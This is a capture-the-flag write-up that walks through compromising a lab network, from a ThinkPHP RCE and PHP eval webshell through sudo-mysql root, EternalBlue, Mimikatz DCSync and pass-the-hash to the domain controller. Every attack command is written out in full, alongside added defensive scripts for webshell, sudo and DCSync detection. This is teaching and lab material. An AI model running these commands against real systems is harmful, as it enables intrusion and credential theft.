This comprehensive writeup documents the complete penetration testing process for the Chunqiu Yunjing Initial CTF challenge, covering the entire attack chain from initial reconnaissance through domain controller compromise.

Target Environment Information

The challenge provides a simulated professional scenario with the following target IP: 39.99.151.82. It's worth noting that the target IP may vary depending on when the challenge environment is instantiated, though the internal network addressing remains consistent across deployments.

Phase 1: Information Gathering

Port Scanning and Service Enumeration

Using Rustscan combined with Nmap for comprehensive TCP port scanning with service fingerprinting and OS detection:

sudo rustscan -a 39.99.151.82 -r 1-65535 -- -sV -O -Pn -n -oA 39.99.151.82_TCP_Ports

Results revealed two open ports:

  • Port 22: OpenSSH 8.2p1 Ubuntu 4ubuntu0.5
  • Port 80: Apache httpd 2.4.41 (Ubuntu)

The service fingerprints clearly indicate an Ubuntu-based operating system. A supplementary UDP scan of the top 20 high-value ports showed every port in the "open|filtered" state, so UDP enumeration was deprioritized for later phases.

Web Application Analysis

Fake Login Interface

Browser access to port 80 revealed a login interface with incomplete functionality. Testing showed that any username/password combination redirected to a non-existent /login.hrml page, and the registration feature was completely non-functional.

Examining the page source code exposed a critical piece of information in the comments: a backend port reference at http://localhost:8080/powers/pow/regUsers. Direct access attempts to this endpoint from outside failed, indicating it was only accessible from the internal network.

Directory Enumeration

Directory brute-forcing with ffuf uncovered several interesting paths:

  • robots.txt - Contained no useful restrictions
  • static/ - Directory with directory traversal vulnerability but no valuable content
  • router.php - A backend API routing mechanism

Parameter brute-forcing on router.php (both GET and POST methods) yielded no results, suggesting custom parameter naming.

Framework Identification

The website's favicon appeared familiar, suggesting a common framework. Calculating the mmh3 hash of the favicon.ico:

import mmh3
import base64
import requests

# Shodan-style favicon hash: MurmurHash3 over the base64-encoded icon bytes.
# encodebytes() keeps the newline-wrapped encoding that this convention expects.
resp = requests.get('http://39.99.151.82/favicon.ico', timeout=10)
resp.raise_for_status()
favicon_hash = mmh3.hash(base64.encodebytes(resp.content))
print(favicon_hash)  # Output: 1165838194

Using observer_ward for fingerprinting confirmed the target was running ThinkPHP. Triggering an error page by submitting invalid input revealed the version: ThinkPHP V5.0.23.

Phase 2: Initial Compromise

Exploiting ThinkPHP RCE

Searching for known vulnerabilities in ThinkPHP 5.0.23 led to the Vulhub RCE exploit. Testing the payload confirmed successful remote code execution.

Webshell Deployment

After confirming the current working directory as /var/www/html/, a simple PHP webshell was deployed:

echo '<?php @eval($_REQUEST["x"]);?>' > /var/www/html/shell.php

Note: Single quotes are essential here to prevent shell variable expansion. Using double quotes would cause the shell to interpret $_REQUEST as a variable, resulting in errors.
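From the defender's side, a one-liner like the shell above has a recognizable shape: a code-execution sink fed directly from a request superglobal. The following scanner is an added example (not part of the writeup or of any tool it mentions) that walks a web root and flags PHP files matching that pattern; the sink list and the sample web root are constructed for the example.

```python
import os
import re
import tempfile

# Code-execution sinks fed straight from a request superglobal, the shape of
# the one-liner deployed above (eval($_REQUEST["x"])). Constructed shortlist.
SINKS = r"(?:eval|assert|system|passthru|shell_exec|exec|popen|proc_open)"
SOURCES = r"\$_(?:REQUEST|POST|GET|COOKIE)"
WEBSHELL_RE = re.compile(
    rf"@?\b{SINKS}\s*\(\s*(?:base64_decode\s*\(\s*)?{SOURCES}\s*\[", re.IGNORECASE
)

def scan_php_file(path):
    """Return (line_no, line) pairs in one file that match the webshell pattern."""
    hits = []
    with open(path, "r", encoding="utf-8", errors="replace") as fh:
        for line_no, line in enumerate(fh, 1):
            if WEBSHELL_RE.search(line):
                hits.append((line_no, line.strip()))
    return hits

def scan_webroot(root):
    """Walk a web root and return {path: hits} for every suspicious PHP file."""
    findings = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.lower().endswith((".php", ".phtml", ".phar")):
                path = os.path.join(dirpath, name)
                hits = scan_php_file(path)
                if hits:
                    findings[path] = hits
    return findings

def demo():
    """Constructed web root: a benign page plus the one-line shell from above."""
    root = tempfile.mkdtemp()
    with open(os.path.join(root, "index.php"), "w") as fh:
        fh.write("<?php echo htmlspecialchars($_GET['q'] ?? ''); ?>\n")
    with open(os.path.join(root, "shell.php"), "w") as fh:
        fh.write('<?php @eval($_REQUEST["x"]);?>\n')
    return sorted(os.path.basename(p) for p in scan_webroot(root))

if __name__ == "__main__":
    print(demo())  # ['shell.php']
```

Pattern matching of this kind catches the simple shells; obfuscated variants need file-integrity monitoring of the web root as well.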

AntSword Connection

AntSword was then connected to the deployed webshell.

Initial reconnaissance from the webshell revealed:

  • Internal IP: 172.22.1.15
  • Internal network: 172.22.0.0/16
  • Hostname: ubuntu-web01
  • Architecture: x86_64

Privilege Escalation

Running sudo -l revealed a critical misconfiguration: the www-data user could execute /usr/bin/mysql as root without a password. Using GTFOBins, privilege escalation was achieved:

sudo /usr/bin/mysql -e '\! whoami'  # Confirmed root execution
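The misconfiguration is easy to audit for. The script below is an added example (not from the writeup) that parses `sudo -l` output and flags entries granting a shell-escape-capable binary such as mysql, with NOPASSWD and root run-as called out; the binary shortlist and the sample output mirroring ubuntu-web01 are constructed.

```python
import re

# Binaries GTFOBins documents as able to run commands when granted via sudo
# (the mysql client escapes with "\! <cmd>"). Constructed shortlist, not exhaustive.
SHELL_ESCAPE_BINARIES = {"mysql", "vim", "vi", "less", "more", "awk", "find",
                         "perl", "python", "python3", "bash", "sh", "env", "tar", "nmap"}

ENTRY_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")

def parse_sudo_l(output):
    """Parse the "(runas) TAG: cmd1, cmd2" entries of `sudo -l` output into dicts."""
    entries = []
    for line in output.splitlines():
        m = ENTRY_RE.match(line)
        if not m:
            continue
        tags = {t.strip() for t in m.group("tags").split(":") if t.strip()}
        cmds = [c.strip() for c in m.group("cmds").split(",") if c.strip()]
        entries.append({"runas": m.group("runas").strip(), "tags": tags, "cmds": cmds})
    return entries

def audit(output):
    """Return (command, reason) findings for entries that hand out a root shell."""
    findings = []
    for entry in parse_sudo_l(output):
        for cmd in entry["cmds"]:
            base = cmd.split()[0].rsplit("/", 1)[-1]
            if cmd == "ALL":
                findings.append((cmd, "unrestricted sudo"))
            elif base in SHELL_ESCAPE_BINARIES:
                why = "shell-escape binary"
                if "NOPASSWD" in entry["tags"]:
                    why += " without password"
                if entry["runas"].split(":")[0].strip() in ("root", "ALL"):
                    why += " as root"
                findings.append((cmd, why))
    return findings

# Constructed sample mirroring the misconfiguration found on ubuntu-web01.
SAMPLE = """\
User www-data may run the following commands on ubuntu-web01:
    (root) NOPASSWD: /usr/bin/mysql
    (root) /usr/bin/systemctl restart apache2
"""

if __name__ == "__main__":
    for cmd, why in audit(SAMPLE):
        print(f"{cmd}: {why}")
```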

Phase 3: Internal Network Reconnaissance

Fscan Deployment

After uploading Fscan to the compromised host (via a VPS reverse proxy due to network constraints), a comprehensive internal network scan was executed:

./fscan -h 172.22.0.0/16

Scan results identified five live hosts:

  • 172.22.1.2 (DC01 - Domain Controller, Windows Server 2016)
  • 172.22.1.15 (Compromised Ubuntu host)
  • 172.22.1.18 (XIAORANG-OA01, Windows Server 2012 R2, running OA system)
  • 172.22.1.21 (XIAORANG-WIN7, Windows Server 2008 R2)
  • 172.22.255.253 (Gateway)

Critical finding: 172.22.1.21 was vulnerable to MS17-010 (EternalBlue).

Establishing Persistence and Routing

Setting up internal network routing through Meterpreter:

run autoroute -s 172.22.0.0/16
use auxiliary/server/socks_proxy  # SOCKS5 proxy on port 1080

Phase 4: Lateral Movement

Exploiting MS17-010

Using the EternalBlue module against 172.22.1.21:

use windows/smb/ms17_010_eternalblue
set payload payload/windows/x64/meterpreter/bind_tcp
set RHOST 172.22.1.21

Successful exploitation granted SYSTEM-level access immediately.

Credential Harvesting

Loading Mimikatz (kiwi extension) and dumping credentials:

load kiwi
creds_all

DCSync attack to harvest domain credentials:

kiwi_cmd "lsadump::dcsync /domain:xiaorang.lab /all /csv"

This successfully extracted NTLM hashes for all domain users, including:

  • krbtgt
  • Administrator: 10cf89a850fb1cdbe6bb432b859164c8
  • Domain machine accounts
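On the domain controller, a DCSync like the one above is visible as Security event 4662 carrying the replication control-access GUIDs in its Properties field, requested by an account that is not a domain controller. The detector below is an added example (not from the writeup); it assumes Directory Service Access auditing is enabled on the DC and that `dc_accounts` lists the DC machine accounts, and the sample events are constructed.

```python
# Security event 4662 on a DC logs access to the domain object; a replication
# request carries these control-access right GUIDs in its Properties field.
REPLICATION_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}

def detect_dcsync(events, dc_accounts):
    """Return alerts for 4662 events that request replication rights from an
    account that is not a known domain-controller machine account."""
    expected = {a.upper() for a in dc_accounts}
    alerts = []
    for ev in events:
        if ev.get("EventID") != 4662:
            continue
        props = ev.get("Properties", "").lower()
        rights = [name for guid, name in REPLICATION_GUIDS.items() if guid in props]
        if not rights:
            continue  # ordinary directory access, not replication
        subject = ev.get("SubjectUserName", "")
        if subject.upper() in expected:
            continue  # DC-to-DC replication is expected to carry these rights
        alerts.append({"subject": subject, "source": ev.get("Computer"), "rights": rights})
    return alerts

# Constructed sample events (4662 field names; values made up for this example).
SAMPLE_EVENTS = [
    {"EventID": 4662, "Computer": "DC01.xiaorang.lab", "SubjectUserName": "DC01$",
     "Properties": "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "Computer": "DC01.xiaorang.lab", "SubjectUserName": "XIAORANG-WIN7$",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "Computer": "DC01.xiaorang.lab", "SubjectUserName": "svc-backup",
     "Properties": "{bf967a86-0de6-11d0-a285-00aa003049e2}"},
]

if __name__ == "__main__":
    for a in detect_dcsync(SAMPLE_EVENTS, ["DC01$"]):
        print(f"possible DCSync by {a['subject']} via {a['source']}: {a['rights']}")
```

Any non-DC principal requesting these rights is worth an immediate look, and stripping replication rights from accounts that do not need them removes the precondition entirely.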

Phase 5: Domain Controller Compromise

Using the harvested Administrator hash to access the domain controller (172.22.1.2):

proxychains python3 /usr/share/doc/python3-impacket/examples/wmiexec.py xiaorang.lab/administrator@172.22.1.2 -hashes :10cf89a850fb1cdbe6bb432b859164c8

Searching for flags revealed this was flag 03 (the final flag). Additional flags were located on:

  • The initial Ubuntu web server (flag 01)
  • The OA server at 172.22.1.18 (flag 02)

Alternative Attack Path

An alternative exploitation path existed through the Xinhu OA system on 172.22.1.18. After brute-forcing the admin credentials (admin/admin123), an unauthorized file upload vulnerability could be exploited combined with a file extension bypass technique to achieve SYSTEM-level access.

Conclusion

This challenge demonstrated a complete attack chain from initial web application compromise through full domain domination, highlighting the importance of:

  • Keeping frameworks updated (ThinkPHP RCE)
  • Restricting sudo permissions (mysql privilege escalation)
  • Patching SMB vulnerabilities (MS17-010)
  • Implementing proper credential protection (DCSync attack)